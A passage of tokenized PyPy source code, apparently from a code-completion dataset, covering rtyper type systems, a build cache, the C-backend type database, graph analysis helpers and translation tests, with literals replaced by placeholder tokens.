func , '<STR_LIT>' ) : <EOL> fnobjattrs = graph . func . _llfnobjattrs_ . copy ( ) <EOL> name = fnobjattrs . pop ( '<STR_LIT>' , name ) <EOL> else : <EOL> fnobjattrs = { } <EOL> _callable = fnobjattrs . pop ( '<STR_LIT>' , graph . func ) <EOL> return constr ( FT , name , graph = graph , _callable = _callable , <EOL> ** fnobjattrs ) <EOL> else : <EOL> return constr ( FT , name , graph = graph ) <EOL> def getexternalcallable ( self , ll_args , ll_result , name , ** kwds ) : <EOL> typ , constr = self . callable_trait <EOL> FT = typ ( ll_args , ll_result ) <EOL> return constr ( FT , name , ** kwds ) <EOL> def getconcretetype ( self , v ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def perform_normalizations ( self , rtyper ) : <EOL> """<STR_LIT>""" <EOL> from pypy . rpython . normalizecalls import perform_normalizations <EOL> perform_normalizations ( rtyper ) <EOL> class LowLevelTypeSystem ( TypeSystem ) : <EOL> name = "<STR_LIT>" <EOL> callable_trait = ( lltype . FuncType , lltype . functionptr ) <EOL> def derefType ( self , T ) : <EOL> assert isinstance ( T , lltype . Ptr ) <EOL> return T . TO <EOL> def deref ( self , obj ) : <EOL> assert isinstance ( lltype . typeOf ( obj ) , lltype . Ptr ) <EOL> return obj . _obj <EOL> def check_null ( self , repr , hop ) : <EOL> vlist = hop . inputargs ( repr ) <EOL> return hop . genop ( '<STR_LIT>' , vlist , resulttype = lltype . Bool ) <EOL> def getconcretetype ( self , v ) : <EOL> return getattr ( v , '<STR_LIT>' , lltype . Ptr ( lltype . PyObject ) ) <EOL> def null_callable ( self , T ) : <EOL> return lltype . nullptr ( T . TO ) <EOL> def generic_is ( self , robj1 , robj2 , hop ) : <EOL> roriginal1 = robj1 <EOL> roriginal2 = robj2 <EOL> if robj1 . lowleveltype is lltype . Void : <EOL> robj1 = robj2 <EOL> elif robj2 . lowleveltype is lltype . Void : <EOL> robj2 = robj1 <EOL> if ( not isinstance ( robj1 . lowleveltype , lltype . Ptr ) or <EOL> not isinstance ( robj2 . lowleveltype , lltype . 
Ptr ) ) : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> roriginal1 , roriginal2 ) ) <EOL> if robj1 . lowleveltype != robj2 . lowleveltype : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> roriginal1 , roriginal2 ) ) <EOL> v_list = hop . inputargs ( robj1 , robj2 ) <EOL> return hop . genop ( '<STR_LIT>' , v_list , resulttype = lltype . Bool ) <EOL> class ObjectOrientedTypeSystem ( TypeSystem ) : <EOL> name = "<STR_LIT>" <EOL> callable_trait = ( ootype . StaticMethod , ootype . static_meth ) <EOL> def derefType ( self , T ) : <EOL> assert isinstance ( T , ootype . OOType ) <EOL> return T <EOL> def deref ( self , obj ) : <EOL> assert isinstance ( ootype . typeOf ( obj ) , ootype . OOType ) <EOL> return obj <EOL> def check_null ( self , repr , hop ) : <EOL> vlist = hop . inputargs ( repr ) <EOL> return hop . genop ( '<STR_LIT>' , vlist , resulttype = ootype . Bool ) <EOL> def getconcretetype ( self , v ) : <EOL> return v . concretetype <EOL> def null_callable ( self , T ) : <EOL> return ootype . null ( T ) <EOL> def generic_is ( self , robj1 , robj2 , hop ) : <EOL> roriginal1 = robj1 <EOL> roriginal2 = robj2 <EOL> if robj1 . lowleveltype is lltype . Void : <EOL> robj1 = robj2 <EOL> elif robj2 . lowleveltype is lltype . Void : <EOL> robj2 = robj1 <EOL> if ( not isinstance ( robj1 . lowleveltype , ( ootype . Instance , ootype . BuiltinADTType ) ) or <EOL> not isinstance ( robj2 . lowleveltype , ( ootype . Instance , ootype . BuiltinADTType ) ) ) and ( robj1 . lowleveltype is not ootype . Class or <EOL> robj2 . lowleveltype is not ootype . Class ) : <EOL> raise TyperError ( '<STR_LIT>' % ( <EOL> roriginal1 , roriginal2 ) ) <EOL> v_list = hop . inputargs ( robj1 , robj2 ) <EOL> return hop . genop ( '<STR_LIT>' , v_list , resulttype = lltype . Bool ) <EOL> LowLevelTypeSystem . instance = LowLevelTypeSystem ( ) <EOL> ObjectOrientedTypeSystem . instance = ObjectOrientedTypeSystem ( ) <EOL> getfunctionptr = LowLevelTypeSystem . instance . getcallable <EOL> from pypy . tool . 
pairtype import pairtype <EOL> from pypy . annotation . model import SomeObject <EOL> class __extend__ ( pairtype ( TypeSystem , SomeObject ) ) : <EOL> def rtyper_makerepr ( ( ts , s_obj ) , rtyper ) : <EOL> return s_obj . rtyper_makerepr ( rtyper ) <EOL> def rtyper_makekey ( ( ts , s_obj ) , rtyper ) : <EOL> if hasattr ( s_obj , "<STR_LIT>" ) : <EOL> return s_obj . rtyper_makekey_ex ( rtyper ) <EOL> return s_obj . rtyper_makekey ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> from threading import RLock <EOL> lock = RLock ( ) <EOL> except ImportError : <EOL> lock = None <EOL> class Cache ( object ) : <EOL> def __init__ ( self ) : <EOL> self . content = { } <EOL> self . _building = { } <EOL> def getorbuild ( self , key ) : <EOL> if lock : lock . acquire ( ) <EOL> try : <EOL> try : <EOL> return self . content [ key ] <EOL> except KeyError : <EOL> if key in self . _building : <EOL> raise Exception , "<STR_LIT>" % ( <EOL> self , key ) <EOL> self . _building [ key ] = True <EOL> try : <EOL> result = self . _build ( key ) <EOL> self . content [ key ] = result <EOL> finally : <EOL> del self . _building [ key ] <EOL> self . _ready ( result ) <EOL> return result <EOL> finally : <EOL> if lock : lock . release ( ) <EOL> getorbuild . _annspecialcase_ = "<STR_LIT>" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , len ( self . content ) ) <EOL> def _ready ( self , result ) : <EOL> pass <EOL> def _freeze_ ( self ) : <EOL> return True </s>
<s> import py <EOL> from pypy . tool . pytest . result import ResultFromMime <EOL> testpath = py . magic . autopath ( ) . dirpath ( '<STR_LIT:data>' ) <EOL> class TestResultCache : <EOL> def test_timeout ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT:0.> <EOL> def test_passed ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT:1.> <EOL> def test_unittest_partial ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT> / <NUM_LIT:15> <EOL> def test_doctest_of ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT> / <NUM_LIT> <EOL> def test_doctest_slash ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT> / <NUM_LIT> <EOL> def test_fail ( self ) : <EOL> test = ResultFromMime ( testpath . join ( '<STR_LIT>' ) ) <EOL> assert test . ratio_of_passed ( ) == <NUM_LIT:0.> </s>
<s> """<STR_LIT>""" <EOL> import autopath <EOL> import os <EOL> ROOT = autopath . pypydir <EOL> EXCLUDE = { } <EOL> def test_no_tabs ( ) : <EOL> def walk ( reldir ) : <EOL> if reldir in EXCLUDE : <EOL> return <EOL> if reldir : <EOL> path = os . path . join ( ROOT , * reldir . split ( '<STR_LIT:/>' ) ) <EOL> else : <EOL> path = ROOT <EOL> if os . path . isfile ( path ) : <EOL> if path . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> f = open ( path , '<STR_LIT:r>' ) <EOL> data = f . read ( ) <EOL> f . close ( ) <EOL> assert '<STR_LIT:\t>' not in data , "<STR_LIT>" % ( reldir , ) <EOL> elif os . path . isdir ( path ) and not os . path . islink ( path ) : <EOL> for entry in os . listdir ( path ) : <EOL> if not entry . startswith ( '<STR_LIT:.>' ) : <EOL> walk ( '<STR_LIT>' % ( reldir , entry ) ) <EOL> walk ( '<STR_LIT>' ) </s>
<s> import py <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . translator . simplify import get_graph <EOL> from pypy . rpython . rmodel import inputconst <EOL> from pypy . tool . ansi_print import ansi_log <EOL> from pypy . annotation . model import setunion , s_ImpossibleValue <EOL> from pypy . translator . unsimplify import split_block , copyvar , insert_empty_block <EOL> from pypy . objspace . flow . model import Constant , Variable , SpaceOperation , c_last_exception <EOL> from pypy . rpython . lltypesystem import lltype <EOL> log = py . log . Producer ( "<STR_LIT>" ) <EOL> py . log . setconsumer ( "<STR_LIT>" , ansi_log ) <EOL> def graph_operations ( graph ) : <EOL> for block in graph . iterblocks ( ) : <EOL> for op in block . operations : <EOL> yield op <EOL> def all_operations ( graphs ) : <EOL> for graph in graphs : <EOL> for block in graph . iterblocks ( ) : <EOL> for op in block . operations : <EOL> yield op <EOL> def annotate ( translator , func , result , args ) : <EOL> args = [ arg . concretetype for arg in args ] <EOL> graph = translator . rtyper . annotate_helper ( func , args ) <EOL> fptr = lltype . functionptr ( lltype . FuncType ( args , result . concretetype ) , func . func_name , graph = graph ) <EOL> c = inputconst ( lltype . typeOf ( fptr ) , fptr ) <EOL> return c <EOL> def var_needsgc ( var ) : <EOL> if hasattr ( var , '<STR_LIT>' ) : <EOL> vartype = var . concretetype <EOL> return isinstance ( vartype , lltype . Ptr ) and vartype . _needsgc ( ) <EOL> else : <EOL> return True <EOL> def needs_conservative_livevar_calculation ( block ) : <EOL> from pypy . rpython . lltypesystem import rclass <EOL> vars = block . getvariables ( ) <EOL> assert len ( block . exits ) == <NUM_LIT:1> <EOL> exitingvars = block . exits [ <NUM_LIT:0> ] . args <EOL> for var in vars : <EOL> TYPE = getattr ( var , "<STR_LIT>" , lltype . Ptr ( lltype . PyObject ) ) <EOL> if isinstance ( TYPE , lltype . 
Ptr ) and not var_needsgc ( var ) : <EOL> if isinstance ( TYPE . TO , lltype . FuncType ) : <EOL> continue <EOL> try : <EOL> lltype . castable ( TYPE , rclass . CLASSTYPE ) <EOL> except lltype . InvalidCast : <EOL> if var in exitingvars : <EOL> return True <EOL> else : <EOL> return False <EOL> def generate_keepalive ( vars , annotator = None ) : <EOL> keepalive_ops = [ ] <EOL> for v in vars : <EOL> if isinstance ( v , Constant ) : <EOL> continue <EOL> if v . concretetype . _is_atomic ( ) : <EOL> continue <EOL> v_keepalive = Variable ( ) <EOL> v_keepalive . concretetype = lltype . Void <EOL> if annotator is not None : <EOL> annotator . setbinding ( v_keepalive , s_ImpossibleValue ) <EOL> keepalive_ops . append ( SpaceOperation ( '<STR_LIT>' , [ v ] , v_keepalive ) ) <EOL> return keepalive_ops <EOL> def split_block_with_keepalive ( block , index_operation , <EOL> keep_alive_op_args = True , <EOL> annotator = None ) : <EOL> splitlink = split_block ( annotator , block , index_operation ) <EOL> afterblock = splitlink . target <EOL> conservative_keepalives = needs_conservative_livevar_calculation ( block ) <EOL> if conservative_keepalives : <EOL> keep_alive_vars = [ var for var in block . getvariables ( ) <EOL> if var_needsgc ( var ) ] <EOL> for i , var in enumerate ( keep_alive_vars ) : <EOL> try : <EOL> index = splitlink . args . index ( var ) <EOL> newvar = afterblock . inputargs [ index ] <EOL> except ValueError : <EOL> splitlink . args . append ( var ) <EOL> newvar = copyvar ( annotator , var ) <EOL> afterblock . inputargs . append ( newvar ) <EOL> keep_alive_vars [ i ] = newvar <EOL> elif keep_alive_op_args and afterblock . operations : <EOL> keep_alive_vars = [ var for var in afterblock . operations [ <NUM_LIT:0> ] . args <EOL> if isinstance ( var , Variable ) and var_needsgc ( var ) ] <EOL> if len ( afterblock . operations ) > <NUM_LIT:1> or afterblock . exitswitch != c_last_exception : <EOL> afterblock . 
operations [ <NUM_LIT:1> : <NUM_LIT:1> ] = generate_keepalive ( keep_alive_vars , <EOL> annotator = annotator ) <EOL> keep_alive_vars = [ ] <EOL> else : <EOL> keep_alive_vars = [ ] <EOL> pos = len ( afterblock . operations ) <EOL> if afterblock . exitswitch == c_last_exception : <EOL> pos -= <NUM_LIT:1> <EOL> afterblock . operations [ pos : pos ] = generate_keepalive ( keep_alive_vars ) <EOL> return splitlink <EOL> def find_calls_from ( translator , graph , memo = None ) : <EOL> if memo and graph in memo : <EOL> return memo [ graph ] <EOL> res = [ i for i in _find_calls_from ( translator , graph ) ] <EOL> if memo is not None : <EOL> memo [ graph ] = res <EOL> return res <EOL> def _find_calls_from ( translator , graph ) : <EOL> for block in graph . iterblocks ( ) : <EOL> for op in block . operations : <EOL> if op . opname == "<STR_LIT>" : <EOL> called_graph = get_graph ( op . args [ <NUM_LIT:0> ] , translator ) <EOL> if called_graph is not None : <EOL> yield block , called_graph <EOL> if op . opname == "<STR_LIT>" : <EOL> graphs = op . args [ - <NUM_LIT:1> ] . value <EOL> if graphs is not None : <EOL> for called_graph in graphs : <EOL> yield block , called_graph <EOL> def find_backedges ( graph , block = None , seen = None , seeing = None ) : <EOL> """<STR_LIT>""" <EOL> backedges = [ ] <EOL> if block is None : <EOL> block = graph . startblock <EOL> if seen is None : <EOL> seen = { block : None } <EOL> if seeing is None : <EOL> seeing = { } <EOL> seeing [ block ] = True <EOL> for link in block . exits : <EOL> if link . target in seen : <EOL> if link . target in seeing : <EOL> backedges . append ( link ) <EOL> else : <EOL> seen [ link . target ] = None <EOL> backedges . extend ( find_backedges ( graph , link . target , seen , seeing ) ) <EOL> del seeing [ block ] <EOL> return backedges <EOL> def compute_reachability ( graph ) : <EOL> reachable = { } <EOL> blocks = list ( graph . iterblocks ( ) ) <EOL> for block in py . builtin . 
reversed ( blocks ) : <EOL> reach = { } <EOL> scheduled = [ block ] <EOL> while scheduled : <EOL> current = scheduled . pop ( ) <EOL> for link in current . exits : <EOL> if link . target in reachable : <EOL> reach [ link . target ] = True <EOL> reach = setunion ( reach , reachable [ link . target ] ) <EOL> continue <EOL> if link . target not in reach : <EOL> reach [ link . target ] = True <EOL> scheduled . append ( link . target ) <EOL> reachable [ block ] = reach <EOL> return reachable <EOL> def find_loop_blocks ( graph ) : <EOL> """<STR_LIT>""" <EOL> loop = { } <EOL> reachable = compute_reachability ( graph ) <EOL> for backedge in find_backedges ( graph ) : <EOL> start = backedge . target <EOL> end = backedge . prevblock <EOL> loop [ start ] = start <EOL> loop [ end ] = start <EOL> scheduled = [ start ] <EOL> seen = { } <EOL> while scheduled : <EOL> current = scheduled . pop ( ) <EOL> connects = end in reachable [ current ] <EOL> seen [ current ] = True <EOL> if connects : <EOL> loop [ current ] = start <EOL> for link in current . exits : <EOL> if link . target not in seen : <EOL> scheduled . append ( link . target ) <EOL> return loop <EOL> def md5digest ( translator ) : <EOL> from pypy . tool . compat import md5 <EOL> graph2digest = { } <EOL> for graph in translator . graphs : <EOL> m = md5 ( ) <EOL> for op in graph_operations ( graph ) : <EOL> m . update ( op . opname + str ( op . result ) ) <EOL> for a in op . args : <EOL> m . update ( str ( a ) ) <EOL> graph2digest [ graph . name ] = m . digest ( ) <EOL> return graph2digest </s>
<s> from pypy . rpython . lltypesystem . lltype import Primitive , Ptr , typeOf , RuntimeTypeInfo , Struct , Array , FuncType , PyObject , Void , ContainerType , OpaqueType , FixedSizeArray , _uninitialized <EOL> from pypy . rpython . lltypesystem import lltype <EOL> from pypy . rpython . lltypesystem . llmemory import WeakRef , _WeakRefType , GCREF <EOL> from pypy . rpython . lltypesystem . rffi import CConstant <EOL> from pypy . rpython . lltypesystem import llgroup <EOL> from pypy . tool . sourcetools import valid_identifier <EOL> from pypy . translator . c . primitive import PrimitiveName , PrimitiveType <EOL> from pypy . translator . c . node import StructDefNode , ArrayDefNode <EOL> from pypy . translator . c . node import FixedSizeArrayDefNode , BareBoneArrayDefNode <EOL> from pypy . translator . c . node import ContainerNodeFactory , ExtTypeOpaqueDefNode <EOL> from pypy . translator . c . support import cdecl , CNameManager <EOL> from pypy . translator . c . support import log , barebonearray <EOL> from pypy . translator . c . extfunc import do_the_getting <EOL> from pypy import conftest <EOL> from pypy . translator . c import gc <EOL> class NoCorrespondingNode ( Exception ) : <EOL> pass <EOL> class LowLevelDatabase ( object ) : <EOL> gctransformer = None <EOL> def __init__ ( self , translator = None , standalone = False , <EOL> gcpolicyclass = None , <EOL> stacklesstransformer = None , <EOL> thread_enabled = False , <EOL> sandbox = False ) : <EOL> self . translator = translator <EOL> self . standalone = standalone <EOL> self . sandbox = sandbox <EOL> self . stacklesstransformer = stacklesstransformer <EOL> if gcpolicyclass is None : <EOL> gcpolicyclass = gc . RefcountingGcPolicy <EOL> self . gcpolicy = gcpolicyclass ( self , thread_enabled ) <EOL> self . structdefnodes = { } <EOL> self . pendingsetupnodes = [ ] <EOL> self . containernodes = { } <EOL> self . containerlist = [ ] <EOL> self . delayedfunctionnames = { } <EOL> self . 
delayedfunctionptrs = [ ] <EOL> self . completedcontainers = <NUM_LIT:0> <EOL> self . containerstats = { } <EOL> self . externalfuncs = { } <EOL> self . helper2ptr = { } <EOL> self . late_initializations = [ ] <EOL> self . namespace = CNameManager ( ) <EOL> if translator is None or translator . rtyper is None : <EOL> self . exctransformer = None <EOL> else : <EOL> self . exctransformer = translator . getexceptiontransformer ( ) <EOL> if translator is not None : <EOL> self . gctransformer = self . gcpolicy . transformerclass ( translator ) <EOL> self . completed = False <EOL> self . instrument_ncounter = <NUM_LIT:0> <EOL> def gettypedefnode ( self , T , varlength = <NUM_LIT:1> ) : <EOL> if varlength <= <NUM_LIT:1> : <EOL> varlength = <NUM_LIT:1> <EOL> key = T <EOL> else : <EOL> key = T , varlength <EOL> try : <EOL> node = self . structdefnodes [ key ] <EOL> except KeyError : <EOL> if isinstance ( T , Struct ) : <EOL> if isinstance ( T , FixedSizeArray ) : <EOL> node = FixedSizeArrayDefNode ( self , T ) <EOL> else : <EOL> node = StructDefNode ( self , T , varlength ) <EOL> elif isinstance ( T , Array ) : <EOL> if barebonearray ( T ) : <EOL> node = BareBoneArrayDefNode ( self , T , varlength ) <EOL> else : <EOL> node = ArrayDefNode ( self , T , varlength ) <EOL> elif isinstance ( T , OpaqueType ) and T . hints . get ( "<STR_LIT>" , False ) : <EOL> node = ExtTypeOpaqueDefNode ( self , T ) <EOL> elif T == WeakRef : <EOL> REALT = self . gcpolicy . get_real_weakref_type ( ) <EOL> node = self . gettypedefnode ( REALT ) <EOL> else : <EOL> raise NoCorrespondingNode ( "<STR_LIT>" % ( T , ) ) <EOL> self . structdefnodes [ key ] = node <EOL> self . pendingsetupnodes . append ( node ) <EOL> return node <EOL> def gettype ( self , T , varlength = <NUM_LIT:1> , who_asks = None , argnames = [ ] ) : <EOL> if isinstance ( T , Primitive ) or T == GCREF : <EOL> return PrimitiveType [ T ] <EOL> elif isinstance ( T , Ptr ) : <EOL> try : <EOL> node = self . gettypedefnode ( T . 
TO ) <EOL> except NoCorrespondingNode : <EOL> pass <EOL> else : <EOL> if hasattr ( node , '<STR_LIT>' ) : <EOL> return node . getptrtype ( ) <EOL> typename = self . gettype ( T . TO ) <EOL> return typename . replace ( '<STR_LIT:@>' , '<STR_LIT>' ) <EOL> elif isinstance ( T , ( Struct , Array , _WeakRefType ) ) : <EOL> node = self . gettypedefnode ( T , varlength = varlength ) <EOL> if who_asks is not None : <EOL> who_asks . dependencies [ node ] = True <EOL> return node . gettype ( ) <EOL> elif T == PyObject : <EOL> return '<STR_LIT>' <EOL> elif isinstance ( T , FuncType ) : <EOL> resulttype = self . gettype ( T . RESULT ) <EOL> argtypes = [ ] <EOL> for i in range ( len ( T . ARGS ) ) : <EOL> if T . ARGS [ i ] is not Void : <EOL> argtype = self . gettype ( T . ARGS [ i ] ) <EOL> try : <EOL> argname = argnames [ i ] <EOL> except IndexError : <EOL> argname = '<STR_LIT>' <EOL> argtypes . append ( cdecl ( argtype , argname ) ) <EOL> argtypes = '<STR_LIT:U+002CU+0020>' . join ( argtypes ) or '<STR_LIT>' <EOL> return resulttype . replace ( '<STR_LIT:@>' , '<STR_LIT>' % argtypes ) <EOL> elif isinstance ( T , OpaqueType ) : <EOL> if T == RuntimeTypeInfo : <EOL> return self . gcpolicy . rtti_type ( ) <EOL> elif T . hints . get ( "<STR_LIT>" , False ) : <EOL> node = self . gettypedefnode ( T , varlength = varlength ) <EOL> if who_asks is not None : <EOL> who_asks . dependencies [ node ] = True <EOL> return '<STR_LIT>' % node . name <EOL> elif T . hints . get ( '<STR_LIT>' , None ) == '<STR_LIT:C>' : <EOL> return '<STR_LIT>' % T . hints [ '<STR_LIT>' ] <EOL> else : <EOL> return '<STR_LIT>' % ( <EOL> valid_identifier ( '<STR_LIT>' + T . tag ) , ) <EOL> elif isinstance ( T , llgroup . GroupType ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( T , ) ) <EOL> def getcontainernode ( self , container , _dont_write_c_code = True , ** buildkwds ) : <EOL> try : <EOL> node = self . 
containernodes [ container ] <EOL> except KeyError : <EOL> T = typeOf ( container ) <EOL> if isinstance ( T , ( lltype . Array , lltype . Struct ) ) : <EOL> if hasattr ( self . gctransformer , '<STR_LIT>' ) : <EOL> self . gctransformer . consider_constant ( T , container ) <EOL> nodefactory = ContainerNodeFactory [ T . __class__ ] <EOL> node = nodefactory ( self , T , container , ** buildkwds ) <EOL> self . containernodes [ container ] = node <EOL> if not _dont_write_c_code : <EOL> return node <EOL> kind = getattr ( node , '<STR_LIT>' , '<STR_LIT:?>' ) <EOL> self . containerstats [ kind ] = self . containerstats . get ( kind , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> self . containerlist . append ( node ) <EOL> if self . completed : <EOL> pass <EOL> return node <EOL> def get ( self , obj ) : <EOL> if <NUM_LIT:1> : <EOL> if isinstance ( obj , CConstant ) : <EOL> return obj . c_name <EOL> T = typeOf ( obj ) <EOL> if isinstance ( T , Primitive ) or T == GCREF : <EOL> return PrimitiveName [ T ] ( obj , self ) <EOL> elif isinstance ( T , Ptr ) : <EOL> if obj : <EOL> try : <EOL> container = obj . _obj <EOL> except lltype . DelayedPointer : <EOL> name = obj . _obj0 <EOL> assert name . startswith ( '<STR_LIT>' ) <EOL> n = len ( '<STR_LIT>' ) <EOL> if len ( name ) == n : <EOL> raise <EOL> if isinstance ( lltype . typeOf ( obj ) . TO , lltype . FuncType ) : <EOL> if id ( obj ) in self . delayedfunctionnames : <EOL> return self . delayedfunctionnames [ id ( obj ) ] [ <NUM_LIT:0> ] <EOL> funcname = name [ n : ] <EOL> funcname = self . namespace . uniquename ( '<STR_LIT>' + funcname ) <EOL> self . delayedfunctionnames [ id ( obj ) ] = funcname , obj <EOL> else : <EOL> funcname = None <EOL> self . delayedfunctionptrs . append ( obj ) <EOL> return funcname <EOL> else : <EOL> if id ( obj ) in self . delayedfunctionnames : <EOL> forcename = self . delayedfunctionnames [ id ( obj ) ] [ <NUM_LIT:0> ] <EOL> node = self . 
getcontainernode ( container , <EOL> forcename = forcename ) <EOL> assert node . ptrname == forcename <EOL> return forcename <EOL> if isinstance ( container , int ) : <EOL> return '<STR_LIT>' % ( cdecl ( self . gettype ( T ) , '<STR_LIT>' ) , <EOL> obj . _obj ) <EOL> node = self . getcontainernode ( container ) <EOL> return node . ptrname <EOL> else : <EOL> return '<STR_LIT>' % ( cdecl ( self . gettype ( T ) , '<STR_LIT>' ) , ) <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % ( obj , ) ) <EOL> def complete ( self , show_progress = True ) : <EOL> assert not self . completed <EOL> if self . translator and self . translator . rtyper : <EOL> do_the_getting ( self , self . translator . rtyper ) <EOL> def dump ( ) : <EOL> lst = [ '<STR_LIT>' % keyvalue <EOL> for keyvalue in self . containerstats . items ( ) ] <EOL> lst . sort ( ) <EOL> log . event ( '<STR_LIT>' % ( i , '<STR_LIT:U+0020>' . join ( lst ) ) ) <EOL> i = self . completedcontainers <EOL> if show_progress : <EOL> show_i = ( i // <NUM_LIT:1000> + <NUM_LIT:1> ) * <NUM_LIT:1000> <EOL> else : <EOL> show_i = - <NUM_LIT:1> <EOL> finish_callbacks = [ ] <EOL> if self . gctransformer : <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . gctransformer . finish_helpers ) ) <EOL> if self . stacklesstransformer : <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . stacklesstransformer . finish ) ) <EOL> if self . gctransformer : <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . gctransformer . get_final_dependencies ) ) <EOL> finish_callbacks . append ( ( '<STR_LIT>' , <EOL> self . gctransformer . finish_tables ) ) <EOL> def add_dependencies ( newdependencies ) : <EOL> for value in newdependencies : <EOL> if isinstance ( typeOf ( value ) , ContainerType ) : <EOL> self . getcontainernode ( value ) <EOL> else : <EOL> self . get ( value ) <EOL> while True : <EOL> while True : <EOL> while self . pendingsetupnodes : <EOL> lst = self . pendingsetupnodes <EOL> self . 
pendingsetupnodes = [ ] <EOL> for nodedef in lst : <EOL> nodedef . setup ( ) <EOL> if i == len ( self . containerlist ) : <EOL> break <EOL> node = self . containerlist [ i ] <EOL> add_dependencies ( node . enum_dependencies ( ) ) <EOL> i += <NUM_LIT:1> <EOL> self . completedcontainers = i <EOL> if i == show_i : <EOL> dump ( ) <EOL> show_i += <NUM_LIT:1000> <EOL> if self . delayedfunctionptrs : <EOL> lst = self . delayedfunctionptrs <EOL> self . delayedfunctionptrs = [ ] <EOL> progress = False <EOL> for fnptr in lst : <EOL> try : <EOL> fnptr . _obj <EOL> except lltype . DelayedPointer : <EOL> self . delayedfunctionptrs . append ( fnptr ) <EOL> else : <EOL> self . get ( fnptr ) <EOL> progress = True <EOL> if progress : <EOL> continue <EOL> if finish_callbacks : <EOL> logmsg , finish = finish_callbacks . pop ( <NUM_LIT:0> ) <EOL> newdependencies = finish ( ) <EOL> log . database ( logmsg ) <EOL> if newdependencies : <EOL> add_dependencies ( newdependencies ) <EOL> continue <EOL> break <EOL> assert not self . delayedfunctionptrs <EOL> self . completed = True <EOL> if show_progress : <EOL> dump ( ) <EOL> log . database ( "<STR_LIT>" ) <EOL> def globalcontainers ( self ) : <EOL> for node in self . containerlist : <EOL> if node . globalcontainer : <EOL> yield node <EOL> def get_lltype_of_exception_value ( self ) : <EOL> if self . translator is not None and self . translator . rtyper is not None : <EOL> exceptiondata = self . translator . rtyper . getexceptiondata ( ) <EOL> return exceptiondata . lltype_of_exception_value <EOL> else : <EOL> return Ptr ( PyObject ) <EOL> def getstructdeflist ( self ) : <EOL> result = [ ] <EOL> seen = { } <EOL> def produce ( node ) : <EOL> if node not in seen : <EOL> deps = node . dependencies . keys ( ) <EOL> deps . sort ( key = lambda x : x . name ) <EOL> for othernode in deps : <EOL> produce ( othernode ) <EOL> result . append ( node ) <EOL> seen [ node ] = True <EOL> nodes = self . structdefnodes . values ( ) <EOL> nodes . 
sort ( key = lambda x : x . name ) <EOL> for node in nodes : <EOL> produce ( node ) <EOL> return result <EOL> def need_sandboxing ( self , fnobj ) : <EOL> if not self . sandbox : <EOL> return False <EOL> if hasattr ( fnobj , '<STR_LIT>' ) : <EOL> return not fnobj . _safe_not_sandboxed <EOL> else : <EOL> return "<STR_LIT>" <EOL> def prepare_inline_helpers ( self ) : <EOL> all_nodes = self . globalcontainers ( ) <EOL> funcnodes = [ node for node in all_nodes if node . nodekind == '<STR_LIT>' ] <EOL> graphs = [ ] <EOL> for node in funcnodes : <EOL> for graph in node . graphs_to_patch ( ) : <EOL> graphs . append ( graph ) <EOL> self . gctransformer . prepare_inline_helpers ( graphs ) <EOL> def all_graphs ( self ) : <EOL> graphs = [ ] <EOL> for node in self . containerlist : <EOL> if node . nodekind == '<STR_LIT>' : <EOL> for graph in node . graphs_to_patch ( ) : <EOL> graphs . append ( graph ) <EOL> return graphs </s>
<s> import py <EOL> import sys , os , re <EOL> from pypy . rlib . rarithmetic import r_longlong <EOL> from pypy . rlib . debug import ll_assert , debug_print <EOL> from pypy . translator . translator import TranslationContext <EOL> from pypy . translator . backendopt import all <EOL> from pypy . translator . c . genc import CStandaloneBuilder , ExternalCompilationInfo <EOL> from pypy . annotation . listdef import s_list_of_strings <EOL> from pypy . tool . udir import udir <EOL> from pypy . tool . autopath import pypydir <EOL> class TestStandalone ( object ) : <EOL> config = None <EOL> def test_hello_world ( self ) : <EOL> def entry_point ( argv ) : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" ) <EOL> argv = argv [ <NUM_LIT:1> : ] <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" + str ( len ( argv ) ) + "<STR_LIT:\n>" ) <EOL> for s in argv : <EOL> os . write ( <NUM_LIT:1> , "<STR_LIT>" + str ( s ) + "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( ) <EOL> data = cbuilder . cmdexec ( '<STR_LIT>' ) <EOL> assert data . startswith ( '''<STR_LIT>''' ) <EOL> def test_print ( self ) : <EOL> def entry_point ( argv ) : <EOL> print "<STR_LIT>" <EOL> argv = argv [ <NUM_LIT:1> : ] <EOL> print "<STR_LIT>" , len ( argv ) <EOL> print "<STR_LIT>" , argv <EOL> print "<STR_LIT>" , <EOL> print [ len ( s ) for s in argv ] <EOL> return <NUM_LIT:0> <EOL> t = TranslationContext ( self . config ) <EOL> t . buildannotator ( ) . build_types ( entry_point , [ s_list_of_strings ] ) <EOL> t . buildrtyper ( ) . specialize ( ) <EOL> cbuilder = CStandaloneBuilder ( t , entry_point , t . config ) <EOL> cbuilder . generate_source ( ) <EOL> cbuilder . compile ( 